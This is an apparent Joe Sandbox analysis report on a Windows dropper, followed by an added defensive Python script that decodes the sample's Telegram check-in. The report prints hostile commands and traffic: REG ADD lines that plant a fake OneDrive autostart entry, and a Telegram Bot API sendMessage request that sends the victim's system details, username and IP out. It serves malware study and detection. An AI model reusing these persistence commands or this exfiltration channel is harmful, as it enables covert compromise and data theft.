Windows Analysis Report
68e7a0fa9f7dbbb34bc4bad97690ea72.exe

Overview

General Information

Sample Name: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe
Analysis ID: 620098
MD5: d9079709c37a9977a75123a38cbd6660
SHA1: 0f7af4f8fe342afc826d5b6a7ffb0c145b371c50
SHA256: b6a3b9630a6ed8f626b7fdc083c73a03c57923c1055314bacaa49031c5fa6ae3
Tags: exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Sigma detected: Add file from suspicious location to autostart registry
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Uses the Telegram API (likely for C&C communication)
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
PE file contains section with special chars
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Entry point lies outside standard sections
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses reg.exe to modify the Windows registry
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

AV Detection

Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe Virustotal: Detection: 32%
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe Avira: detection malicious, Label: TR/Redcap.sblry
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe Virustotal: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe ReversingLabs: Detection: 14%
Source: 9.3.[New]1.exe.2ab0000.0.unpack Avira: Label: TR/ATRAPS.Gen4
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49753 version: TLS 1.2
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_0040646B FindFirstFileA,FindClose, 0_2_0040646B
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_004027A1 FindFirstFileA, 0_2_004027A1
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004058BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00406F00 FindFirstFileA, 11_2_00406F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_004364E3 FindFirstFileExW, 11_2_004364E3

Networking

Source: unknown DNS query: name: api.telegram.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe DNS query: name: ipinfo.io
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe DNS query: name: ip-api.com
Source: global traffic HTTP traffic detected:
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View IP Address: 208.95.112.1
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Wed, 04 May 2022 09:04:58 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: AppLaunch.exe, 0000000B.00000002.455822807.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000003.454692399.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org/botTELEG
Source: AppLaunch.exe, 0000000B.00000002.456337506.0000000006C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org/botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20N
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: AppLaunch.exe, 0000000B.00000003.454466555.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.455882630.0000000000E68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: AppLaunch.exe, 00000019.00000002.797439121.0000000006A79000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.797490031.0000000006A8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
Source: AppLaunch.exe, 00000019.00000002.797439121.0000000006A79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: AppLaunch.exe, 00000019.00000002.797439121.0000000006A79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com4bkX
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ipinfo.io/json
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ipinfo.io/json4
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ipinfo.io/jsonHt
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ipinfo.io/jsonxt
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://ocsp.entrust.net02
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://ocsp.entrust.net03
Source: AppLaunch.exe, 00000019.00000002.797439121.0000000006A79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://www.entrust.net/rpa0
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://www.entrust.net/rpa03
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000003.454466555.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.455882630.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.455822807.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000003.454692399.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20
Source: AppLaunch.exe, 0000000B.00000002.456337506.0000000006C12000.00000004.00000800.00020000.00000000.sdmp, json[1].json.11.dr String found in binary or memory: https://ipinfo.io/missingauth
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown DNS traffic detected: queries for: ipinfo.io
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00406590 InternetReadFile, 11_2_00406590
Source: global traffic HTTP traffic detected:
    GET /botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.40%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20BOba%0A HTTP/1.1
    Accept: text/*
    User-Agent: soft
    Host: api.telegram.org
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /json HTTP/1.1
    Accept: text/*
    User-Agent: soft
    Host: ipinfo.io
Source: global traffic HTTP traffic detected:
    GET /botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.40%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20BOba%0A HTTP/1.1
    Accept: text/*
    User-Agent: soft
    Host: api.telegram.org
Source: [New]1.exe, 00000009.00000002.428693209.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040535C
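The Telegram request above is the sample's check-in. The text parameter percent-encodes a multi-line message ("New worker connected!" followed by GPU, CPU, RAM, Username, IP, Country and Build tag lines); the IP and country values are what ipinfo.io/json returns, and the cached reply is the dropped json[1].json that also carries the ipinfo.io/missingauth string. The bot token and chat id appear as the literal placeholders TELEGRAM_APIKEY and TELEGRAM_CHATID both in AppLaunch.exe memory and on the wire, and the only response captured on the TLS session is a 55-byte application/json 404, the exact length of Telegram's standard Not Found reply for an unknown bot token; my reading is an unconfigured build rather than a sandbox redaction. The ip-api.com request asks only for the hosting field, which flags datacenter ranges and is a cheap sandbox test, but the report shows the request and not what the sample does with the answer. The script below is an added example and not part of the Joe Sandbox report: it decodes the captured request into its fields and pulls Bot API token/method pairs out of the memory strings so the same triage can be repeated on another capture. Everything except the OBSERVED_* values is this example's own code.

```python
"""Decode the Telegram Bot API beacon and triage the C2 strings from this report.

Added example, not Joe Sandbox code. OBSERVED_* values are copied from the
report's HTTP traffic and memory strings; the helpers are this example's own.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Request line exactly as captured on the TLS session to api.telegram.org.
OBSERVED_TELEGRAM_REQUEST = (
    "GET /botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text="
    "%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A"
    "%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A"
    "%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A"
    "%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A"
    "%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.40%0A"
    "%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20BOba%0A HTTP/1.1"
)
# Strings the report lists from AppLaunch.exe memory (process 0xB).
OBSERVED_STRINGS = [
    "http://api.telegram.org/botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20N",
    "https://api.telegram.org/",
    "http://ipinfo.io/json",
    "http://ip-api.com/line/?fields=hosting",
]

BOT_PATH = re.compile(r"/bot([^/]+)/(\w+)")
BOT_URL = re.compile(r"https?://api\.telegram\.org/bot([^/\s\"']+)/(\w+)", re.I)
# Message lines are shaped "<em dash> Key: value"; \u2014 is the em dash.
FIELD_LINE = re.compile(r"^\u2014\s*([^:]+):\s*(.*)$")


def parse_telegram_beacon(request_line):
    """Return bot token, chat id, message title and the Key: value fields carried
    in `text`, or None if the request is not a Bot API sendMessage call."""
    method, target, _version = request_line.split(" ", 2)
    url = urlsplit(target)
    m = BOT_PATH.match(url.path)
    if method != "GET" or m is None or m.group(2) != "sendMessage":
        return None
    query = parse_qs(url.query)          # percent-decodes the UTF-8 message text
    text = query.get("text", [""])[0]
    fields = {}
    for line in text.splitlines():
        fm = FIELD_LINE.match(line.strip())
        if fm:
            fields[fm.group(1).strip()] = fm.group(2).strip()
    return {
        "bot_token": m.group(1),
        "chat_id": query.get("chat_id", [""])[0],
        "title": text.splitlines()[0] if text else "",
        "fields": fields,
    }


def find_telegram_endpoints(strings):
    """Triage helper for strings/memory dumps: every (token, method) pair that
    addresses the Bot API. A real token here is itself an IOC and a pivot."""
    return sorted({m.groups() for s in strings for m in BOT_URL.finditer(s)})


if __name__ == "__main__":
    beacon = parse_telegram_beacon(OBSERVED_TELEGRAM_REQUEST)
    print(beacon["title"])
    for key, value in beacon["fields"].items():
        print(f"  {key}: {value}")
    print(find_telegram_endpoints(OBSERVED_STRINGS))
```

On a proxy or TLS-inspecting sensor the same two regexes are enough to alert on any client that is not a known Telegram desktop application talking to api.telegram.org/bot<token>/, since the Bot API is for bots, not end users.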

System Summary

Source: [New]1.exe.0.dr Static PE information: section name: e5WJl%
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403348
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_00406945 0_2_00406945
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_0040711C 0_2_0040711C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00401000 11_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_004031B0 11_2_004031B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_0042F090 11_2_0042F090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_0042F2C2 11_2_0042F2C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_0042C500 11_2_0042C500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_0042F51F 11_2_0042F51F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_0042A59B 11_2_0042A59B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_0043E70F 11_2_0043E70F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_0043585E 11_2_0043585E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_0043597E 11_2_0043597E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00427990 11_2_00427990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00439F59 11_2_00439F59
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_00A138DD 21_2_00A138DD
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_009FF3D3 21_2_009FF3D3
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_00A023D0 21_2_00A023D0
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_00A11C9A 21_2_00A11C9A
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_00A0858C 21_2_00A0858C
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_009FF605 21_2_009FF605
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_00A137BD 21_2_00A137BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011CC370 25_2_011CC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011CE2D0 25_2_011CE2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C1479 25_2_011C1479
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C0858 25_2_011C0858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C0B30 25_2_011C0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C1D71 25_2_011C1D71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011CCC40 25_2_011CCC40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011CC028 25_2_011CC028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C20A8 25_2_011C20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C10A9 25_2_011C10A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C1570 25_2_011C1570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C0B20 25_2_011C0B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C0B6A 25_2_011C0B6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C1E21 25_2_011C1E21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_09567530 25_2_09567530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_09567520 25_2_09567520
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: String function: 009FAE40 appears 33 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: String function: 00425540 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: String function: 00430E17 appears 167 times
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe File read: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe "C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe"
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Process created: C:\Users\user\AppData\Roaming\[New]1.exe C:\Users\user\AppData\Roaming\[New]1.exe
Source: C:\Users\user\AppData\Roaming\[New]1.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\[New]1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 020000000000000000000000
Source: C:\Windows\SysWOW64\reg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\reg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Process created: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe File created: C:\Users\user\AppData\Roaming\[New]1.exe
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe File created: C:\Users\user\AppData\Local\Temp\nsp43D.tmp
Source: classification engine Classification label: mal100.troj.evad.winEXE@18/7@3/3
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar, 0_2_0040216B
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_0040460D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00406940 CreateToolhelp32Snapshot, 11_2_00406940
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Mutant created: \Sessions\1\BaseNamedObjects\9D16FBEF0D8A8F87529DE06A1C43C737
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_01
Source: 21.3.[New]Salvity_crypted(2).exe.2570000.0.unpack, u0002u2002.cs Cryptographic APIs: 'CreateDecryptor'
Source: 25.2.AppLaunch.exe.400000.0.unpack, u0002u2002.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe Static file information: File size 5888624 > 1048576
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_009FA743 push ecx; ret 21_2_009FA756
Source: [New]1.exe.0.dr Static PE information: section name: crL2t
Source: [New]1.exe.0.dr Static PE information: section name: 0wrVPjE
Source: [New]1.exe.0.dr Static PE information: section name: YW7wta
Source: [New]1.exe.0.dr Static PE information: section name: obFJa
Source: [New]1.exe.0.dr Static PE information: section name: e5WJl%
Source: [New]1.exe.0.dr Static PE information: section name: 9RdLoc
Source: [New]1.exe.0.dr Static PE information: section name: Lnxjc
Source: [New]Salvity_crypted(2).exe.0.dr Static PE information: section name: CwRJt
Source: [New]Salvity_crypted(2).exe.0.dr Static PE information: section name: V1Huayq
